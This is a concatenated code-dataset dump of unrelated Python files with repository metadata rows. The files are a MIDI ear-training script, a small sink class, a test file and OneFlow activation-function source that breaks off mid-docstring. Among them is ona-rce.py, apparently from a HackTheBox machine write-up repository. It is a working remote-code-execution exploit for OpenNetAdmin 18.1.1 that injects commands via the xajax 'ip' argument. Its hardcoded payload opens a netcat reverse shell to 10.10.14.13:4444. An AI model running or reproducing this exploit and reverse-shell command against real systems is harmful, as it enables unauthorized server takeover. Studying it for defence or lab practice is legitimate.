if splitNote[0] == nameNote(noteOne).lower() and splitNote[1] == nameNote(noteTwo).lower():
round += 1
print("Correct. Next round. " + str(round) + ".:")
done = True
match = True
else:
playTwoNotes(name2Note(splitNote[0]), name2Note(splitNote[1]))
except KeyboardInterrupt:
pass
| 27.283019 | 155 | 0.603389 | #!/usr/bin/python
# Written by Stjepan Horvat
# ( zvanstefan@gmail.com )
# by the exercises from David Lucal Burge - Perfect Pitch Ear Traning Supercourse
# Thanks to Wojciech M. Zabolotny ( wzab@ise.pw.edu.pl ) for snd-virmidi example
# ( wzab@ise.pw.edu.pl )
import random
import time
import sys
import re
fname="/dev/snd/midiC2D0"
#fname=sys.argv[1]
fin=open(fname,"rb")
fout=open(fname,"wb")
#keymin=int(sys.argv[2])
#keymax=int(sys.argv[3])
#keymin=int(60)
#keymax=int(72)
#c major scale
print ("Exercise 7-4:")
print ("C D and E. Harmonic and melodic pitch indentification. Melodic doubles.")
#from c to c'' white tones
#c major scale
#notes = [ 36, 38, 40, 41, 43, 45, 47, 48, 50, 52, 53, 55, 57, 59, 60, 62, 64, 65, 67, 69, 71, 72, 74, 76, 77, 79, 81, 83, 84, 86, 88, 89, 91, 93, 95, 96 ]
notes = [ 36, 38, 40, 48, 50, 52, 60, 62, 64, 72, 74, 76, 84, 86, 88, 96 ]
noteC = [ 36, 48, 60, 72, 84, 96 ]
def playNote(note):
fout.write((chr(0x90)+chr(note)+chr(127)).encode('utf-8'))
fout.flush()
time.sleep(0.7)
fout.write((chr(0x80)+chr(note)+chr(127)).encode('utf-8'))
fout.flush()
def playTwoNotes(noteOne, noteTwo):
fout.write((chr(0x90)+chr(noteOne)+chr(127)).encode('utf-8'))
fout.write((chr(0x90)+chr(noteTwo)+chr(127)).encode('utf-8'))
fout.flush()
time.sleep(0.7)
fout.write((chr(0x80)+chr(noteOne)+chr(127)).encode('utf-8'))
fout.write((chr(0x80)+chr(noteTwo)+chr(127)).encode('utf-8'))
fout.flush()
def nameNote(note):
if note in noteC:
return("C")
elif note-2 in noteC:
return("D")
elif note-4 in noteC:
return("E")
elif note-5 in noteC:
return("F")
elif note-7 in noteC:
return("G")
elif note-9 in noteC:
return("A")
elif note-11 in noteC:
return("H")
def name2Note(name):
if name == "c":
return(60)
if name == "d":
return(62)
if name == "e":
return(64)
usage = "Usage: 1-repeat, <note> <note> \"c d\", ?-usage."
round = 1
a = re.compile("^[c-e] [c-e]$")
try:
print(usage)
while True:
noteOne = random.choice(notes)
while True:
noteTwo = random.choice(notes)
if nameNote(noteOne) != nameNote(noteTwo) and noteOne < noteTwo:
break
match = False
while not match:
done = False
playTwoNotes(noteOne, noteTwo)
while not done:
n = input("? ")
if n == "1":
playTwoNotes(noteOne, noteTwo)
if n == "?":
print(usage)
#TODO:bug da prima sve umjesto samo imena nota
elif a.match(n):
splitNote = n.split()
if splitNote[0] == nameNote(noteOne).lower() and splitNote[1] == nameNote(noteTwo).lower():
round += 1
print("Correct. Next round. " + str(round) + ".:")
done = True
match = True
else:
playTwoNotes(name2Note(splitNote[0]), name2Note(splitNote[1]))
except KeyboardInterrupt:
pass
| 859 | 0 | 92 |
bf6ec23f96f67a0ce44645429441edc8de70865c | 207 | py | Python | src/sinks/sink.py | lavriv92/sinks | bbd116ea9a2beb14179a86aa2e8c931582939b36 | [
"MIT"
] | 1 | 2021-12-22T13:43:34.000Z | 2021-12-22T13:43:34.000Z | src/sinks/sink.py | lavriv92/sinks | bbd116ea9a2beb14179a86aa2e8c931582939b36 | [
"MIT"
] | null | null | null | src/sinks/sink.py | lavriv92/sinks | bbd116ea9a2beb14179a86aa2e8c931582939b36 | [
"MIT"
] | null | null | null | import functools
import requests
from sinks.base_source import BaseSource
| 20.7 | 79 | 0.748792 | import functools
import requests
from sinks.base_source import BaseSource
class Source(BaseSource):
def __call__(self):
return functools.reduce(lambda acc, f: f(acc), self.funcs, self.source)
| 78 | 4 | 49 |
fb2b284ea4ef5aaab01e5a4a4aad1fc067550c17 | 720 | py | Python | tests/test_accmip6.py | pkufubo/acccmip6 | 762200f314a26b4e0eeb971b607c1b3a81a57d30 | [
"MIT"
] | 59 | 2019-09-19T10:01:00.000Z | 2022-03-31T07:05:00.000Z | tests/test_accmip6.py | pkufubo/acccmip6 | 762200f314a26b4e0eeb971b607c1b3a81a57d30 | [
"MIT"
] | 6 | 2020-11-19T08:58:23.000Z | 2022-02-07T12:57:23.000Z | tests/test_accmip6.py | pkufubo/acccmip6 | 762200f314a26b4e0eeb971b607c1b3a81a57d30 | [
"MIT"
] | 10 | 2019-11-24T15:39:59.000Z | 2022-01-22T08:58:21.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_accmip6
----------------------------------
Tests for `accmip6` module.
"""
import pytest
from pathlib import Path
from acccmip6.utilities.c6db import SearchDB
from acccmip6.utilities.util import _dir_path, _Construct_urls
| 25.714286 | 94 | 0.604167 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_accmip6
----------------------------------
Tests for `accmip6` module.
"""
import pytest
from pathlib import Path
from acccmip6.utilities.c6db import SearchDB
from acccmip6.utilities.util import _dir_path, _Construct_urls
def test_url_getter():
d = SearchDB()
d.variable = 'var1, var2, var3, varN'
url = d.get_url()
durl=_Construct_urls(['var1', 'var2', 'var3', 'varN'],None,None,None,None)._Durl
assert url == durl+"&variable=var1&variable=var2&variable=var3&variable=varN&limit=10000"
def test_dir_path():
d = _dir_path()
p=Path('.')
assert d._get_dir('') == p.absolute() / 'CMIP6'
| 358 | 0 | 62 |
3069cb0d11663e532a2bd9872633694a80c03d36 | 2,385 | py | Python | Machines/OPENADMIN/ona-rce.py | limitedeternity/HackTheBox | ed8d6fc7ff7b880b1961098bedca1fc5fdf7fd09 | [
"MIT"
] | null | null | null | Machines/OPENADMIN/ona-rce.py | limitedeternity/HackTheBox | ed8d6fc7ff7b880b1961098bedca1fc5fdf7fd09 | [
"MIT"
] | null | null | null | Machines/OPENADMIN/ona-rce.py | limitedeternity/HackTheBox | ed8d6fc7ff7b880b1961098bedca1fc5fdf7fd09 | [
"MIT"
] | 3 | 2021-12-29T10:39:01.000Z | 2022-03-29T22:56:40.000Z | #!/usr/bin/python3
'''
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2020-01-18
# Exploit Author: @amriunix (https://amriunix.com)
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
'''
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
if __name__ == '__main__':
print('[*] OpenNetAdmin 18.1.1 - Remote Code Execution')
filename = sys.argv[0]
if len(sys.argv) != 3:
helper(filename)
else:
print("[+] Connecting !")
opt = sys.argv[1].lower()
target = sys.argv[2] + '/'
if opt == 'check':
if (check(target)):
print("[+] The remote host is vulnerable!")
else:
print("[-] The remote host is NOT vulnerable!")
elif opt == 'exploit':
if (check(target)):
print("[+] Connected Successfully!")
else:
print("[-] Warning: Error while connecting o the remote target")
cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4444 >/tmp/f"
print(exploit(target, cmd))
else:
print("[-] Warning: Command not found !")
| 33.591549 | 98 | 0.587841 | #!/usr/bin/python3
'''
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2020-01-18
# Exploit Author: @amriunix (https://amriunix.com)
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
'''
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def helper(filename):
print("\n[-] Usage: python3 " + filename + " [check | exploit] <URL>")
print("\n[*] Options:")
print("\t[+] check : Verify if the target is vulnerable")
print("\t[+] exploit : Exploiting the target\n")
exit(1)
def check(target):
try:
req = requests.get(url = target, verify = False)
except:
print("[-] Warning: Error while connecting o the remote target")
exit(1)
return('v18.1.1' in req.text)
def exploit(target, cmd):
payload = {
'xajax':'window_submit',
'xajaxr':'1574117726710',
'xajaxargs[]':['tooltips','ip=>;echo \"BEGIN\";{} 2>&1;echo \"END\"'.format(cmd),'ping']
}
try:
req = requests.post(url = target, data = payload, verify = False)
except:
print("[-] Warning: Error while connecting o the remote target")
exit(1)
data = req.text
result = data[data.find('BEGIN')+6:data.find('END')-1]
return(result)
if __name__ == '__main__':
print('[*] OpenNetAdmin 18.1.1 - Remote Code Execution')
filename = sys.argv[0]
if len(sys.argv) != 3:
helper(filename)
else:
print("[+] Connecting !")
opt = sys.argv[1].lower()
target = sys.argv[2] + '/'
if opt == 'check':
if (check(target)):
print("[+] The remote host is vulnerable!")
else:
print("[-] The remote host is NOT vulnerable!")
elif opt == 'exploit':
if (check(target)):
print("[+] Connected Successfully!")
else:
print("[-] Warning: Error while connecting o the remote target")
cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4444 >/tmp/f"
print(exploit(target, cmd))
else:
print("[-] Warning: Command not found !")
| 904 | 0 | 67 |
42175e58c2c15f5ee99e556b90c3a5806c720a50 | 23,640 | py | Python | oneflow/python/nn/modules/activation.py | wanghongsheng01/framework_enflame | debf613e05e3f5ea8084c3e79b60d0dd9e349526 | [
"Apache-2.0"
] | null | null | null | oneflow/python/nn/modules/activation.py | wanghongsheng01/framework_enflame | debf613e05e3f5ea8084c3e79b60d0dd9e349526 | [
"Apache-2.0"
] | null | null | null | oneflow/python/nn/modules/activation.py | wanghongsheng01/framework_enflame | debf613e05e3f5ea8084c3e79b60d0dd9e349526 | [
"Apache-2.0"
] | null | null | null | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import oneflow as flow
import oneflow._oneflow_internal
from oneflow.python.nn.module import Module
from oneflow.python.oneflow_export import oneflow_export, experimental_api
from oneflow.python.framework.tensor import register_tensor_op
from typing import Optional
@oneflow_export("nn.ReLU")
@experimental_api
class ReLU(Module):
r"""Applies the rectified linear unit function element-wise:
:math:`\text{ReLU}(x) = (x)^+ = \max(0, x)`
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import oneflow.experimental as flow
>>> import numpy as np
>>> flow.enable_eager_execution()
>>> relu = flow.nn.ReLU()
>>> ndarr = np.asarray([1, -2, 3])
>>> x = flow.Tensor(ndarr)
>>> relu(x).numpy()
array([1., 0., 3.], dtype=float32)
"""
@oneflow_export("nn.ReLU6")
@experimental_api
class ReLU6(Module):
r"""Applies the element-wise function:
.. math::
\text{Relu6}(x) = \begin{cases}
6 & \text{ if } x > 6 \\
0 & \text{ if } x < 0 \\
x & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> relu6 = flow.nn.ReLU6()
>>> out = relu6(input).numpy()
>>> print(out)
[0. 0. 0.5]
"""
@oneflow_export("nn.Tanh")
@experimental_api
class Tanh(Module):
r"""This operator computes the hyperbolic tangent value of Tensor.
The equation is:
.. math::
out = \frac{e^x-e^{-x}}{e^x+e^{-x}}
Args:
x (oneflow.Tensor): A Tensor
Returns:
oneflow.Tensor: The result Tensor
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-1, 0, 1]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> tanh = flow.nn.Tanh()
>>> out = tanh(input).numpy()
>>> print(out)
[-0.7615942 0. 0.7615942]
"""
@oneflow_export("tanh")
@register_tensor_op("tanh")
@experimental_api
def tanh_op(x):
r"""This operator computes the hyperbolic tangent value of Tensor.
The equation is:
.. math::
out = \frac{e^x-e^{-x}}{e^x+e^{-x}}
Args:
x (oneflow.Tensor): A Tensor
Returns:
oneflow.Tensor: The result Tensor
For example:
.. code-block:: python
import oneflow as flow
import numpy as np
x = np.array([-1, 0, 1]).astype(np.float32)
input = flow.Tensor(x)
tanh = flow.nn.Tanh()
out = tanh(input).numpy()
# out [-0.7615942 0. 0.7615942]
"""
return Tanh()(x)
@oneflow_export("nn.ELU")
@experimental_api
class ELU(Module):
r"""Applies the element-wise function:
.. math::
\text{ELU}(x) = \begin{cases}
x & \text{ if } x \gt 0 \\
\alpha*(exp(x)-1) & \text{ if } x \le 0 \\
\end{cases}
Args:
alpha: the :math:`\alpha` value for the ELU formulation. Default: 1.0
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> elu = flow.nn.ELU()
>>> out = elu(input).numpy()
>>> print(out)
[-0.39346933 0. 0.5 ]
"""
@oneflow_export("nn.GELU")
@experimental_api
class GELU(Module):
r"""Gelu activation operator.
The equation is:
.. math::
out = 0.5 * x * (1 + tanh(\sqrt{\frac{2}{\pi}} * (x + 0.044715x^{3})))
Args:
x (oneflow.Tensor): Input Tensor
Returns:
oneflow.Tensor: A Tensor.
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> gelu = flow.nn.GELU()
>>> out = gelu(input).numpy()
>>> print(out)
[-0.15426877 0. 0.34573123]
"""
@oneflow_export("gelu")
@register_tensor_op("gelu")
@experimental_api
def gelu_op(x):
r"""Gelu activation operator.
The equation is:
.. math::
out = 0.5 * x * (1 + tanh(\sqrt{\frac{2}{\pi}} * (x + 0.044715x^{3})))
Args:
x (oneflow.Tensor): Input Tensor
Returns:
oneflow.Tensor: A Tensor.
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> gelu = flow.nn.GELU()
>>> out = gelu(input).numpy()
>>> print(out)
[-0.15426877 0. 0.34573123]
"""
return GELU()(x)
@oneflow_export("nn.Sigmoid")
@experimental_api
class Sigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{Sigmoid}(x) = \sigma(x) = \frac{1}{1 + \exp(-x)}
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
x = flow.Tensor(
np.array(
[
[0.81733328, 0.43621480, 0.10351428],
[-1.15555191, -0.67776406, 0.27372134],
]
)
)
m = flow.nn.Sigmoid() # or y = flow.sigmoid(x)
y = m(x)
# [[0.69366997, 0.60735673, 0.52585548],
# [0.23947647, 0.33676055, 0.56800622]]
"""
@oneflow_export("sigmoid")
@register_tensor_op("sigmoid")
@experimental_api
def sigmoid_op(x):
r"""Applies the element-wise function:
.. math::
\text{Sigmoid}(x) = \sigma(x) = \frac{1}{1 + \exp(-x)}
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
x = flow.Tensor(
np.array(
[
[0.81733328, 0.43621480, 0.10351428],
[-1.15555191, -0.67776406, 0.27372134],
]
)
)
y = x.sigmoid()
# [[0.69366997, 0.60735673, 0.52585548],
# [0.23947647, 0.33676055, 0.56800622]]
"""
return Sigmoid()(x)
@oneflow_export("nn.Hardsigmoid")
@experimental_api
class Hardsigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{Hardsigmoid}(x) = \begin{cases}
0 & \text{ if } x \le -3 \\
1 & \text{ if } x \ge +3 \\
\frac{x}{6} + \frac{1}{2} & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> hardsigmoid = flow.nn.Hardsigmoid()
>>> out = hardsigmoid(input).numpy()
>>> print(out)
[0.41666666 0.5 0.5833333 ]
"""
@oneflow_export("nn.Softmax")
@experimental_api
@oneflow_export("softmax")
@register_tensor_op("softmax")
@experimental_api
def softmax_op(tensor, dim=None):
r"""Applies the Softmax function to an n-dimensional input Tensor
rescaling them so that the elements of the n-dimensional output Tensor
lie in the range [0,1] and sum to 1.
Softmax is defined as:
.. math::
\text{Softmax}(x_{i}) = \frac{\exp(x_i)}{\sum_j \exp(x_j)}
When the input Tensor is a sparse tensor then the unspecifed
values are treated as ``-inf``.
Shape:
- Input: :math:`(*)` where `*` means, any number of additional
dimensions
- Output: :math:`(*)`, same shape as the input
Returns:
a Tensor of the same dimension and shape as the input with
values in the range [0, 1]
Args:
dim (int): A dimension along which Softmax will be computed (so every slice
along dim will sum to 1).
For example:
.. code-block:: python
import oneflow as flow
import numpy as np
m = flow.nn.Softmax(dim = 2)
x = flow.Tensor(
np.array(
[[[[-0.46716809, 0.40112534, 0.61984003],
[-1.31244969, -0.42528763, 1.47953856]]],
[[[ 1.02978742, -0.49383053, 1.88214159],
[ 1.35351622, -1.46251285, -1.40751374]]]]
)
)
y = m(x)
# [[[[0.6995764 0.6955959 0.29740235]
# [0.3004236 0.30440408 0.7025977 ]]]
# [[[0.4197673 0.7248568 0.96407217]
# [0.58023274 0.27514324 0.03592779]]]]
"""
return Softmax(dim)(tensor)
@oneflow_export("nn.LogSoftmax")
@experimental_api
class LogSoftmax(Module):
r"""Applies the :math:`\log(\text{Softmax}(x))` function to an n-dimensional
input Tensor.
The LogSoftmax formulation can be simplified as:
.. math::
\text{LogSoftmax}(x_{i}) = \log\left(\frac{\exp(x_i) }{ \sum_j \exp(x_j)} \right)
Args:
dim (int): A dimension along which LogSoftmax will be computed.
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
import oneflow.experimental as flow
import numpy as np
m = flow.nn.LogSoftmax(dim=1)
x = flow.Tensor(
np.array(
[[ 0.4296, -1.1957, 2.5463],
[ 1.2552, -1.5747, 0.6923]]
)
)
y = m(x)
# [[-2.251349 -3.8766491 -0.13464898]
# [-0.48770458 -3.3176045 -1.0506046 ]]
"""
@oneflow_export("nn.LogSigmoid")
@experimental_api
class LogSigmoid(Module):
r"""Applies the element-wise function:
.. math::
\text{LogSigmoid}(x) = \log\left(\frac{ 1 }{ 1 + \exp(-x)}\right)
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> logsigmoid = flow.nn.LogSigmoid()
>>> out = logsigmoid(input).numpy()
>>> print(out)
[-0.974077 -0.6931472 -0.47407696]
"""
@oneflow_export("nn.Softplus")
@experimental_api
class Softplus(Module):
r"""Applies the element-wise function:
.. math::
\text{Softplus}(x) = \frac{1}{\beta} * \log(1 + \exp(\beta * x))
SoftPlus is a smooth approximation to the ReLU function and can be used
to constrain the output of a machine to always be positive.
For numerical stability the implementation reverts to the linear function
when :math:`input \times \beta > threshold`.
Args:
beta: the :math:`\beta` value for the Softplus formulation. Default: 1
threshold: values above this revert to a linear function. Default: 20
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> softplus = flow.nn.Softplus()
>>> out = softplus(input).numpy()
>>> print(out)
[0.474077 0.6931472 0.974077 ]
"""
@oneflow_export("nn.Hardswish")
@experimental_api
class Hardswish(Module):
r"""Applies the hardswish function, element-wise, as described in the paper:
`Searching for MobileNetV3`_.
.. math::
\text{Hardswish}(x) = \begin{cases}
0 & \text{ if } x \le -3 \\
x & \text{ if } x \ge +3 \\
x*(x+3)/6 & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> hardswish = flow.nn.Hardswish()
>>> out = hardswish(input).numpy()
>>> print(out)
[-0.20833333 0. 0.29166666]
.. _`Searching for MobileNetV3`:
https://arxiv.org/abs/1905.02244
"""
@oneflow_export("nn.Hardtanh")
@experimental_api
class Hardtanh(Module):
r"""
Applies the HardTanh function element-wise
HardTanh is defined as:
.. math::
\text{HardTanh}(x) = \begin{cases}
1 & \text{ if } x > 1 \\
-1 & \text{ if } x < -1 \\
x & \text{ otherwise } \\
\end{cases}
The range of the linear region :math:`[-1, 1]` can be adjusted using
:attr:`min_val` and :attr:`max_val`.
Args:
min_val: minimum value of the linear region range. Default: -1
max_val: maximum value of the linear region range. Default: 1
inplace: can optionally do the operation in-place. Default: ``False``
Keyword arguments :attr:`min_value` and :attr:`max_value`
have been deprecated in favor of :attr:`min_val` and :attr:`max_val`.
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> m = flow.nn.Hardtanh()
>>> arr = np.array([0.2, 0.3, 3.0, 4.0])
>>> x = flow.Tensor(arr)
>>> out = m(x).numpy()
>>> print(out)
[0.2 0.3 1. 1. ]
"""
@oneflow_export("nn.LeakyReLU")
@experimental_api
class LeakyReLU(Module):
r"""Applies the element-wise function:
.. math::
\text{LeakyReLU}(x) = \max(0, x) + \text{negative_slope} * \min(0, x)
or
.. math::
\text{LeakyRELU}(x) = \begin{cases}
x, & \text{ if } x \geq 0 \\
\text{negative_slope} \times x, & \text{ otherwise }
\end{cases}
Args:
negative_slope: Controls the angle of the negative slope. Default: 1e-2
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> m = flow.nn.LeakyReLU(0.1)
>>> arr = np.array([0.2, 0.3, 3.0, 4.0])
>>> x = flow.Tensor(arr)
>>> out = m(x).numpy()
>>> print(out)
[0.2 0.3 3. 4. ]
"""
if __name__ == "__main__":
import doctest
doctest.testmod()
| 25.751634 | 89 | 0.544036 | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import oneflow as flow
import oneflow._oneflow_internal
from oneflow.python.nn.module import Module
from oneflow.python.oneflow_export import oneflow_export, experimental_api
from oneflow.python.framework.tensor import register_tensor_op
from typing import Optional
def _softmax_need_transpose(x, axis):
assert type(axis) is int
dim_num = len(x.shape)
assert dim_num >= 2
if axis < 0:
axis += dim_num
assert axis >= 0
assert axis < dim_num
need_transpose = False
permute = list(range(dim_num))
if axis != dim_num - 1:
need_transpose = True
permute[axis] = permute[-1]
permute[-1] = axis
return need_transpose, permute
@oneflow_export("nn.ReLU")
@experimental_api
class ReLU(Module):
r"""Applies the rectified linear unit function element-wise:
:math:`\text{ReLU}(x) = (x)^+ = \max(0, x)`
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import oneflow.experimental as flow
>>> import numpy as np
>>> flow.enable_eager_execution()
>>> relu = flow.nn.ReLU()
>>> ndarr = np.asarray([1, -2, 3])
>>> x = flow.Tensor(ndarr)
>>> relu(x).numpy()
array([1., 0., 3.], dtype=float32)
"""
def __init__(self, inplace: bool = False):
super().__init__()
self._op = flow.builtin_op("relu").Input("in").Output("out").Build()
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("nn.ReLU6")
@experimental_api
class ReLU6(Module):
r"""Applies the element-wise function:
.. math::
\text{Relu6}(x) = \begin{cases}
6 & \text{ if } x > 6 \\
0 & \text{ if } x < 0 \\
x & \text{ otherwise } \\
\end{cases}
Args:
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> relu6 = flow.nn.ReLU6()
>>> out = relu6(input).numpy()
>>> print(out)
[0. 0. 0.5]
"""
def __init__(self, inplace: bool = False):
super().__init__()
self._op = (
flow.builtin_op("hardtanh")
.Input("in")
.Attr("min_val", 0.0)
.Attr("max_val", 6.0)
.Output("out")
.Build()
)
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("nn.Tanh")
@experimental_api
class Tanh(Module):
r"""This operator computes the hyperbolic tangent value of Tensor.
The equation is:
.. math::
out = \frac{e^x-e^{-x}}{e^x+e^{-x}}
Args:
x (oneflow.Tensor): A Tensor
Returns:
oneflow.Tensor: The result Tensor
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-1, 0, 1]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> tanh = flow.nn.Tanh()
>>> out = tanh(input).numpy()
>>> print(out)
[-0.7615942 0. 0.7615942]
"""
def __init__(self):
super().__init__()
self._op = flow.builtin_op("tanh").Input("x").Output("y").Build()
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("tanh")
@register_tensor_op("tanh")
@experimental_api
def tanh_op(x):
r"""This operator computes the hyperbolic tangent value of Tensor.
The equation is:
.. math::
out = \frac{e^x-e^{-x}}{e^x+e^{-x}}
Args:
x (oneflow.Tensor): A Tensor
Returns:
oneflow.Tensor: The result Tensor
For example:
.. code-block:: python
import oneflow as flow
import numpy as np
x = np.array([-1, 0, 1]).astype(np.float32)
input = flow.Tensor(x)
tanh = flow.nn.Tanh()
out = tanh(input).numpy()
# out [-0.7615942 0. 0.7615942]
"""
return Tanh()(x)
@oneflow_export("nn.ELU")
@experimental_api
class ELU(Module):
r"""Applies the element-wise function:
.. math::
\text{ELU}(x) = \begin{cases}
x & \text{ if } x \gt 0 \\
\alpha*(exp(x)-1) & \text{ if } x \le 0 \\
\end{cases}
Args:
alpha: the :math:`\alpha` value for the ELU formulation. Default: 1.0
inplace: can optionally do the operation in-place. Default: ``False``
Shape:
- Input: :math:`(N, *)` where `*` means, any number of additional
dimensions
- Output: :math:`(N, *)`, same shape as the input
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> elu = flow.nn.ELU()
>>> out = elu(input).numpy()
>>> print(out)
[-0.39346933 0. 0.5 ]
"""
def __init__(self, alpha: float = 1.0, inplace: bool = False):
super().__init__()
self._op = (
flow.builtin_op("elu")
.Input("in")
.Attr("alpha", alpha)
.Output("out")
.Build()
)
def forward(self, x):
res = self._op(x)[0]
return res
@oneflow_export("nn.GELU")
@experimental_api
class GELU(Module):
r"""Gelu activation operator.
The equation is:
.. math::
out = 0.5 * x * (1 + tanh(\sqrt{\frac{2}{\pi}} * (x + 0.044715x^{3})))
Args:
x (oneflow.Tensor): Input Tensor
Returns:
oneflow.Tensor: A Tensor.
For example:
.. code-block:: python
>>> import numpy as np
>>> import oneflow.experimental as flow
>>> flow.enable_eager_execution()
>>> x = np.array([-0.5, 0, 0.5]).astype(np.float32)
>>> input = flow.Tensor(x)
>>> gelu = flow.nn.GELU()
